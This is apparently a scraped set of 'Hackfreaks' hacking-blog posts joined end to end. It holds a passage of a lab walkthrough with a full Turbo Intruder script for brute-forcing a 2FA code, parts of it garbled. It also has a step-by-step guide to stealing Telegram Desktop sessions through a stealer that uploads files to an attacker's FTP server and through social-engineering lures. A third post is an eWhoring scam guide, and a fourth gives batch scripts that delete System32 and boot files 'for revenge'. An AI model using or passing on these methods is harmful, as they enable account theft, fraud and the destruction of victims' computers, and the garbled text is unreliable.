Initial Stepper setup Now you can go to the next send credentials request and use the session and variables in it csrf. To do this, go to the next step (Step 2) and instead of the existing session values and CSRF token, substitute the reference to the variables in the following form: $VAR:session$ and $VAR:csrf$. You end up with something like this: POST /login HTTP/1.1 Host: ac3f1f861fe209fb80374867009900fe.web-security-academy.net Cookie: session=$VAR:session$ Content-Type: application/x-www-form-urlencoded Content-Length: 70 csrf=$VAR:csrf$&username=carlos&password=montoya Let’s execute this second step by clicking on the Execute Step button and get an answer where they will try to redirect us to the page /login2 and give us a new session ID, which we need to capture again using regular expressions and pass to the next step No ... 3. Create the same variable session as in point 4, and go to step number 3. In step # 3, do not forget to change the session value to a variable again $VAR:session$ and execute the request, since we just need to get the CSRF token for the last step. After completing the request, add the parsing of the CSRF token again as a variable csrf, as we did in step 5 earlier. Now we can try the entire sequence and check if it works. Click on the Execute Sequence button at the very bottom of the module window. We see that the sequence was executed correctly and at the last step we receive a response with a proposal to enter the OTP code. Now our task is to run this sequence 10 thousand times. To do this, we transfer the POST request /login2 from the Proxy tab to Intruder. Panel <br> <br> we Intruder of The of the Up Up Need to the remove the symbols of the substitutions § in the fields of the session and the the the the the CSRF token and a leave-a the Substitution only in the field mfa-code like of SO of of of of of of of of of of of: mfa-code=§1337§. To to sequence of the To the To the To the To the To Our the steps Stepper module is the the the Executed for each request of the Intruder, the add the the request of the of the of The of The of The headers as with with the the with the with the FOLLOWS: X-Stepper-Execute-Before: The name of your sequence]. Also, we substitute the names of our variables $VAR:session$ and $VAR:csrf$ in Intruder package, just correct them $VAR:[Name of your sequence]: session $ and $VAR:[here too]:csrf$. In Intruder I got the following request packet: POST /login2 HTTP/1.1 Host: ac311f2c1f2abcbd807689da0068009a.web-security-academy.net Cookie: session=$VAR:evil:session$ Content-Type: application/x-www-form-urlencoded X-Stepper-Execute-Before: evil Content-Length: 51 csrf=$VAR:evil:csrf$&mfa-code=§1337§ In this example, the name of my sequence is evil. Now, before each request from Intruder, a sequence of previously prepared requests will be executed, which will transfer the received session and CSRF token values to the packet. The last step is to set up the load in the Payloads tab, in the same way as we did in the previous section. The Payload to the of The of The of the of The Choosing the Type of the the the the Specify the of value of the Numbers and figures That <br> <br> <br> <br> we want to the generate the the the : From: 0, To: 9999, Step: 1, Min integer digits: 4. Let’s launch our attack! You can track sent packets in the Logger tab that appears or using the Logger ++ module. This time I was more fortunate, my code was 0261. What is important to notice? Unlike the previous version, we are not limited to one thread and created five threads, and the smartest ones could disable the Set Connection: close checkbox in the load options and remove this header from the packages in Stepper and Intruder to increase the speed of work ... Let’s draw conclusions. Capabilities: due to the fact that the Stepper module supports sessions, passing the value of the session and token from request to request, we can use multithreading of requests and our variables will not conflict in threads; cross attacks become available to us, when we can run several sequences in parallel; a natively understandable request-to-request state transfer setup and an easy-to-add header X-Stepper-Execute-Before:that launches Stepper for any module. Problems: in fact, Stepper does not allow as many threads as we would like. About three threads do manage to work together, but due to the peculiarities of the module code, their larger number only slows down the execution; you have to manually adjust the variables for each request, which can look dull and boring. This plugin is more suitable for using it with the Repeater module, as the developers warned us about in the welcome message. Method 3. Using the Turbo Intruder plugin Turbo Intruder is one of the most powerful tools in the Burp Suite and should be mastered by every self-respecting Burp user. It can also be downloaded from GitHub . Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It is designed to complement Burp Intruder by handling attacks that require exceptional speed, duration, or difficulty. This module has the following features. Fast: Turbo Intruder uses a handcrafted HTTP stack with speed in mind. As a result, it can seriously outperform even trendy asynchronous Go scripts for many purposes (in fact, the stack can be chosen, and most of them will be familiar to you). Scalability: Turbo Intruder can achieve flat memory usage, allowing robust multi-day attacks. It can also be run in a headless environment via the command line. Flexibility: Attacks are configurable using Python. This allows complex requirements such as signed requests and multi-stage attack sequences to be met. In addition, a custom HTTP stack allows you to handle malformed requests that break other libraries. Convenience: Boring results can be automatically filtered out using an advanced diff algorithm adapted from Backslash Powered Scanner. This means you can launch an attack and get useful results in two clicks. Knowing the basics of Python is required to use Turbo Intruder. However, all we need to get started is to install Turbo Intruder from the Extender module. After installation, we will immediately move on to solving the problem. Select the very first package in the sequence in the Proxy tab GET /loginand right-click on it. And then select the item Extensions → Send to turbo intruder. The Turbo Intruder panel that opens will display a request and sample scripts that you can select for use and modification. In this case, all we need to win is to write a script that will solve the problem. Below I will give my example code and explain the logic of the script (give me a discount on quality, remembering that pentesters cannot code): import re import time #Regulars for pulling session IDs and CSRF tokens re_csrf = 'name="csrf" value="([\w\d]+)"' re_session = 'session=([\d\w]+)' iterable = 0 def queueRequests(target, wordlists): global engine # We include one request for one connection, so as not to violate the execution logic, connections in accordance with what the application will withstand. # All these values will have to be calibrated from server to server. The task server does not hold high load very well, so we will limit ourselves to five parallel connections engine = RequestEngine(endpoint='https://ac051f441e762a3780359cb6002300a2.web-security-academy.net:443',concurrentConnections=5,requestsPerConnection=1) # Run the first queries, which will trigger subsequent queries. # We make a delay of one second so that the threads do not execute synchronously, but alternate. for x in xrange(1,6): print '1. GET /login Request' engine.queue(target.req,'') time.sleep(1) def handleResponse(req, interesting): global engine global iterable if 'Location: /my-account' in req.response: # If we received this title in the response, then we won table.add(req) print 'You Win!' return None if 'Incorrect security code' in req.response: # If we receive a message about incorrectly entered code in the response, it means that we used one attempt, and then we start a new iteration of requests table.add(req) print '1. GET /login Request' engine.queue(target.req,'') return None if 'Please enter your 4-digit security code' in req.response: # If in response we receive an offer to enter OTP, then we send a request with an attempt to enter OTP match_csrf = re.search(re_csrf, req.response) match_session = re.search(re_session, req.getRequest()) req = '''POST /login2 HTTP/1.1\r\nHost: ac051f441e762a3780359cb6002300a2.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s''' print '4. POST /login2 Request' engine.queue(req, [match_session.group(1),match_csrf.group(1),str(iterable).zfill(4)]) iterable += 1 print 'Iterable: ' + str(iterable) return None if 'Location: /login2' in req.response: # If in the response we receive a message about the transition to the page / login2, it means that we have previously entered the correct credits and now we receive a new session ID and go to the page to take CSRF for a request with OTP match_session = re.search(re_session, req.response) req = '''GET /login2 HTTP/1.1\r\nHost: ac051f441e762a3780359cb6002300a2.web-security-academy.net\r\nCookie: session=%s\r\n\r\n''' print '3. GET /login2 Request' engine.queue(req, match_session.group(1)) return None if '<form class=login-form method=POST action=/login>' in req.response: # If the first request was successful, then we will receive a page with a proposal to enter a username and password, enter a username and password match_session = re.search(re_session, req.response) match_csrf = re.search(re_csrf, req.response) req = '''POST /login HTTP/1.1\r\nHost: ac051f441e762a3780359cb6002300a2.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=carlos&password=montoya''' print '2. POST /login Request' engine.queue(req, [match_session.group(1),match_csrf.group(1)]) return None Since Turbo Intruder does not have the ability to conveniently maintain a session between requests, you have to do it by hand, creating new requests based on session IDs received from previous requests. As a first approximation, the logic of the script is as follows. I am running five primary queries that run on five concurrent connections. Further, the response to each request is processed. The response handler sets a condition that it received the expected response and then executes the next logical request. For example, after receiving a response with an invitation to enter a password, a request is made to enter a username and password, and so on. With this script, I was able to run 400 attempts (~ 1500 requests) for 30 seconds to solve the task about 20 times-bys tray than in the previous examples. To be honest, we could spend a little more time on the calibration parameters concurrentConnections, requestsPerConnection and pipeline and to solve the problem more quickly, but it was enough for me and it. Let’s summarize for this example. Capabilities: Turbo Intruder can squeeze the maximum speed out of the application; since we write code in Python, you can put logic of almost any complexity into the tool; it is extremely convenient to filter executed queries in the results table, and you can also set your own fields for queries for sorting and filtering. Problems: you need to write code, and this is not much different from writing scripts from scratch, although it gives a great advantage in using prepared abstractions for multithreaded and parallel execution of queries; there is no documentation for the tool, except for a number of examples, which should be enough for you; in the fastest request engines for Intruder, requests and responses are not logged into the Logger or Logger ++ modules, which does not allow convenient viewing of what is happening on the network. You have to use the debugging methods built into the Turbo Intruder itself and its abstractions. CONCLUSION I personally love the Turbo Intruder tool, but for newbies, the Stepper module or built-in macros may be easier to use. However, macros and Stepper may not be suitable for real-world tasks due to their slowness. It is also worth mentioning that in each example, I left several ways to improve the speed of work or increase the number of attempts by about two times with a slight increase in the number of requests. If you come up with improvements, share them in the comments. In addition, it will be great if you can tell us about other options for solving this problem. Thanks for reading! FEW MORE INTRESTING ARTICLE $ 300 per day eWhoring New Method. 18+ only Docker for Pentesters And Bug Bounty. How to find out about vulnerabilities in web applications before attackers Hacking |How to kill someone’s WhatsApp account. Web application firewall(WAF) bypass. How scammers steal cryptocurrency from users Continue reading...
General principles Hey my little freaks. Today I’ll gonna cover your most requested method. So, Straight to the point. This Hacking method is stealing someone else’s session of the desktop version of Telegram for Windows. Those who use the messenger on the computer mostly use it. If the victim uses Telegram only on the phone, this method will not work. Sorry. I’ll cover that method Later. let’s Hunt begin ;) WARNING So, in order to intercept this very session, we need to take possession of only two files of the victim. Here they are: • C: \ Users \ * Computer username * \ AppData \ Roaming \ Telegram Desktop \ tdata: D877F783D5D3EF8Cs (the last character may be different) • D877F783D5D3EF8C \ maps (the last character may also be different) Data acquisition methods 1. Theft with a stealer . This is the most affordable, efficient and reliable way. In this article, we will analyze it in detail. 2. Gaining physical access to the desired machine . Everything is simple here: you quickly copy the files to your flash drive or upload them somewhere on the Internet. But we will not always have such an opportunity, you understand. And still, take a note: under certain conditions, it can be working. And you never know when they will appear. 3. Social engineering . You can just fool this data. For example, under this pretext: the files are overwritten and you can’t log into your account. It sounds silly, but you will find your mammoth, believe me. Or you can do this: put the Telegram logo on the avatar, change the “username” accordingly and lure the files as a “moderator”. The method is proven. Important: write to the victim before registering an account, because immediately after these actions, Telegram throws a spam block. Instructions for hacking with a stealer 1. Download this archive . Our stealer is there. 2. Install Python on your PC . 3. Follow the link and install the Sublime Text 3 code editor. 4. We pass registration on the FTP-server . 5.Using the installed Sublime Text code editor, open the file downloaded in the 1st paragraph and write the data from paragraph 4 in the code: host / login and password from our FTP server (all information will be received there). 6. Compile the Python code into an exe file . 7. We send the finished exe-file to the victim and wait for her to open it. └As a result, we will get 2 .zip files that will come to the FTP server. 8. Download Telegram Portable , then open the tdata folder in Telegram. There we need the D877F783D5D3EF8C folder — open it and replace maps or map1 with our file from the tdata.zip server. 9. Open tdata again, then find the file D877F783D5D3EF8C and delete it, and in its place we upload our file from our tdata1.zip or tdata2.zip. 10. Open Telegram Portable and enter the stolen session. How to provoke a victim to open an exe file There are no universal solutions here. If you have at least some information about the victim, it will be a huge advantage. What are her interests? What does she do? Any information can help send the file in a way that looks appropriate and the victim’s desire to open it is natural. Imagine this situation: we want to hack the channel owner about ways to make money. For example, you can write to the admin on behalf of a channel subscriber, tell a heartbreaking story about the successes we have achieved with the help of his schemes, and throw off the “private software” as a thank you. And you can make it smarter. Let’s say you find a seller of a self-written program on a thematic forum, take his nickname and use it as an account name. From it we write to the admin: “so and so, I sell software, here is the topic on the board, I want to advertise on your channel, how about barter?” As you can imagine, this is a quid pro quo. We are cool private software. He’s free advertising. There is a high probability that the channel owner will be interested in such an offer. And so he finds himself on our hook. Addition There are ways to glue an exe file, for example, with an image or a text document. This makes our task much easier. After all, the chance that the victim will open the picchu is much higher. To do this, use the Joiner. You can find instructions on the internet. Recommendations Do not neglect the means of anonymization. If you follow the instructions, the victim will never know about the crime. But we still advise you to play it safe. If we are talking about hacking with a specific purpose, such as “steal the channel”, then there is nothing to talk about: you need to take care of security 100%. Thanks for reading! FEW MORE INTRESTING ARTICLE $ 300 per day eWhoring New Method. 18+ only Docker for Pentesters And Bug Bounty. How to find out about vulnerabilities in web applications before attackers Hacking |How to kill someone’s WhatsApp account. Web application firewall(WAF) bypass. How scammers steal cryptocurrency from users Continue reading...
HACKFREAKS OFFICIAL Introduction Hey freaks! This article is shared by our friend. And today i’ll share his method or experiance with you. The author of the manual has been working with eWhoring for a long time. For 3 years he tried it on all social networks and, as he says, got a good profit everywhere. But the author of the manual has achieved huge success in this area on Tumblr. Interestingly, this platform was never considered suitable for working with drochers. Many people don’t realize that Tumblr is a goldmine for eWhoring. Why tumblr Another plus of Tumblr is that the number of subscribers is not displayed there. Nobody can find out how many people are subscribed to you and whether anyone is subscribed at all. Therefore, you do not need to spend money on cheating. A trifle, but nice. All of this has created a culture of girls selling private content on Tumblr: sex trade is not considered unacceptable there. It’s easy to build trust with users because there are a lot of real girls there. All of this makes Tumblr an ideal platform for working on a drocher. As stated, there are many live female sellers on Tumblr and they are in high demand. You can easily find them with these keywords: 👇 Even if you search for “PayPal”, more than 80% of the content will be associated with girls who sell intimate photos: 👇 Step 1. Setting up a profile Fundamental moment There is no point in showing how to create a new Tumblr account. And not because it is easy, but because the scheme does NOT work with new accounts. One of the workers got such an account blocked after it went out to $ 100 a day. It will be very disappointing if the same story happens to you. Therefore: 👇 We need an old Tumblr account. Her age must be at least 3 years old. This would seem to be a problem, but let’s look at the situation from the other side: this way the scheme will remain unbroken. Thanks to this unpleasant circumstance, we have less competition and fewer crooked performers that distort the market. In general, if you have an old account, you can start right away. The chance of being blocked is zero. So go ahead! Usually such a profile is either completely empty, or from 2 to 10 messages are published there. Here’s what the account looks like, which the author of the tutorial uses as an example: 👇 Initial settings As soon as you log into your account, there will be a toolbar like this: 👇 1️⃣ Delete all old messages. └A quick way to do this is to follow the link , select all messages and hit “Delete”. 2️⃣ Change the subject. └If the account is more than 5 years old, it will most likely contain an outdated theme. Go here , click on “Edit Topic” and select “Official Tumblr Site”. Account registration Now you need to register an account. To do this well, go over the profiles of girls who sell sex. So you will understand their style and form your own. To search, enter approximately the following keywords: 👇 ☑️ Onlyfans ☑️ Selling content ☑️ Selling n00ds ☑️ Bay my n00ds ☑️ Cashapp ☑️ Premium Snap ☑️ Private content ☑️ Sweet baby When you check 10–30 other profiles, click on the account icon and click “Edit Appearance”. What needs to be changed? 👇 1️⃣ Avatar and cover. 2️⃣ Name, profile name and description. 3️⃣ Colors. But the first thing to do is scroll down and disable all settings. The task is not to leave any buttons on. It should be like this: 👇 Avatar and cover Put an ordinary photo on your avatar, without sex. As a cover, you can already use something more honest, but without tin. See examples: 👇 If your pack doesn’t have a suitable photo for the cover, don’t worry. On some profiles, for example, they use this simple analogue: 👇 Name, profile title and description Name To find the right name, you first need to check which ones are already there and choose the best one. It’s all done here: 👇 There is a simple trick. First, choose a maiden name from this list . Now search for the selected name on this site . There is a huge database of girls from adult sites. Check that this slider is in this position: 👇 If we select, for example, “Sophie”, the search results will be like this: 👇 With this simple trick, you will find the right name very quickly. Profile name In this field you need to enter the name of the girl. We decided on him a minute ago. Description Here you need to give a little information about yourself: age, hobbies, etc. Plus, it should be unobtrusively noted that you are selling sex. Below are examples of good descriptions. Try not to copy it cleanly. Color spectrum Your task is to edit these 4 elements: 👇 You can google “Girly Colors” if you can’t decide: 👇 There is a way to check the color codes and font of other profile headings. Let’s say we want to understand what is used on this profile: 👇 Press “CTRL + U” (to view the source code of the page), then — “CRTL + F” (search command). And then we enter “Optica”. In the source code, the colors will be displayed like this: 👇 To check the “Heading Font” press “CRTL + F” and enter “font-family”. The font name will be displayed like this: 👇 If you have, for example, 10 accounts, it is best to use a pink color scheme for at least 3–5 of them. This is an unimportant moment, but there is some kind of intimate appeal in this color. But maybe, for example, like this: 👇 Summary This completes the first stage of preparation. We have fit into this article everything that could fit. The manual is very voluminous, so I had to divide it into several parts. In the next, we will analyze the content of the account — what content, how and why to publish in order to get a profit. See you later! Continue reading...
Hey Freaks! Hackfreaks here Today we will digress a little from all the familiar topics, and I will show you what you can do with the most common notebook. And the coolest thing is that absolutely each of you can repeat it on your PC. Let’s go! IMPORTANT: If I accidentally wrote a dash somewhere instead of a minus in the code, then change it to minus. You will be given an error at startup and the line number where this error is located. But everything seems to be in order. So just copy! IMPORTANT: To disable the script, you must terminate wscript.exe in the processes (tab in the task manager) So, here are 15 cool notepad tricks you should try: 1. Continuously pull out the CD drive using a notepad Don’t you think it would be fun if you could play with your friend by making his CD drive over and over again? Just enter the text below into notepad and save it as a .vbs file. Double click on the .vbs file to see it work. Set oWMP = CreateObject (“WMPlayer.OCX.7”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count> = 1 then For i = 0 to colCDROMs.Count — 1 colCDROMs.Item (i) .Eject Next For i = 0 to colCDROMs.Count — 1 colCDROMs.Item (i) .Eject Next End If wscript.sleep 5000 2. Shutting down the computer using notepad Imagine that instead of clicking the Start button, then the Shutdown button, and then the OK button, you can simply double-click the icon to shut down the system. The Notepad trick code written below does just that. Just save the file as a .vbs file and hit it when you need to shutdown the system. @echo off msg * System will now shut down shutdown -c “Bye!” -s 3.Always open Notepad on your friend’s computer Another notepad trick to play with your friend’s system is to run a command that will open his / her notebook periodically. @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top 4. Make a personal journal or diary A special function that allows us to make a journal exists in the notepad. Using it, we can create logs of things, as notepad will provide the date and time for us whenever we open a certain type of log file. To do this, simply enter “.LOG” in notepad and save it under any name. Now, whenever you open that particular file, you will see notepad automatically enter the date and time it was opened, and then you can make a journal entry and save the journal. 5. Matrix effect We will now discuss a Notepad trick that can turn our command line into something that looks like it just came out of the matrix movie, or maybe something that looks like something straight out of the hacker’s system. To do this, all you have to do is paste the following code in notepad @echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start Now you need to save this file with a .bat extension and after clicking on the .bat file you created you will see something similar. A little tweak to tweak this cool effect is that you can change the value in front of the color, that is 02 in color 02, to any other value, for example 03; this will change the color of the text that appears on the command line. 6. Switch Capslock several times using Notepad You can play with someone else’s computer, or perhaps your own computer, by writing a script that can toggle Caps Lock repeatedly. Just copy and paste the code below into notepad. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop Now save it as a .vbs file and use it to see the magic. 7.type slowly This is a trick that will make the text print slowly, try it, just copy and paste the text below into notepad and save it as a .vbs file. WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "wa" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "mg" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! " 8. Convert text to speech using notepad. Just copy and paste the code below into notepad and save it as a .vbs file. When you play it, you will get a dialog box asking what you want to tell the computer. Have some fun. Dim message, sapi message=InputBox("What do you want me to say?", "Speak to Me") Set sapi=CreateObject("sapi.spvoice") sapi.Speak message 9.Removing boot files using notepad One way to destroy your computer is to delete the files that help it start the computer. While not recommended, it is code that has the authority to do so. @ECHO OFF ATTRIB -R -S -HC:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT ATTRIB -R -S -HC:\BOOT.INI DEL C:\BOOT.INI ATTRIB -R -S -HC:\NTLDR DEL C:\NTLDR ATTRIB -R -S -HC:\WINDOWS\WIN.INI DEL C:\WINDOWS\WIN.INI SAVE IT AS .BAT FILE. This will turn off the computer and delete the files necessary to bring the computer back to normal. Do not try to do this on your computer until you want to lose all of your data. 10. Deleting System32 files using notepad Want to get revenge on someone? Just use this code, save it as a .bat file and see what it does to that person’s system. This will remove all the System32 files required for the system to function properly. Just paste the following into notepad and save it as a .bat file. DEL C:\WINDOWS\SYSTEM32\*.*/Q 11. Hit Enter continuously What if we want the function of our enter button to repeat over and over, better than pressing it over and over, is to use the below code Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop Save it as a .vbs file and watch its magic 12. Type something over and over again The code for typing something over and over is mentioned below, you can use it to write something over and over and over until you exit the loop. Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "I'll be typed again and again" loop save it as a .vbs file for it to work. 13. Computer crash Displays a message on the screen that the system is infected and asks to restart the computer, and then includes many command lines, calculators, notebooks and much more. Script : on error resume next 14. Endlessly beeping system speaker vbs script makes the system speaker in the computer processor beep endlessly Script : Set S = CreateObject ("Wscript.Shell") 15. The endlessly buzzing floppy disk slot Act: Simulates that there is a floppy disk in the floppy drive. Makes it hum. Script: Set WSHShell = WScript.CreateObject ("WScript.Shell") I think you know how you can apply them in practice. The simplest thing is to collect a single file in Bat to exe convert. For example, insert any script into some movie and run it. It will be very interesting to watch the reaction of an ordinary user. Thank you all for your attention! Continue reading...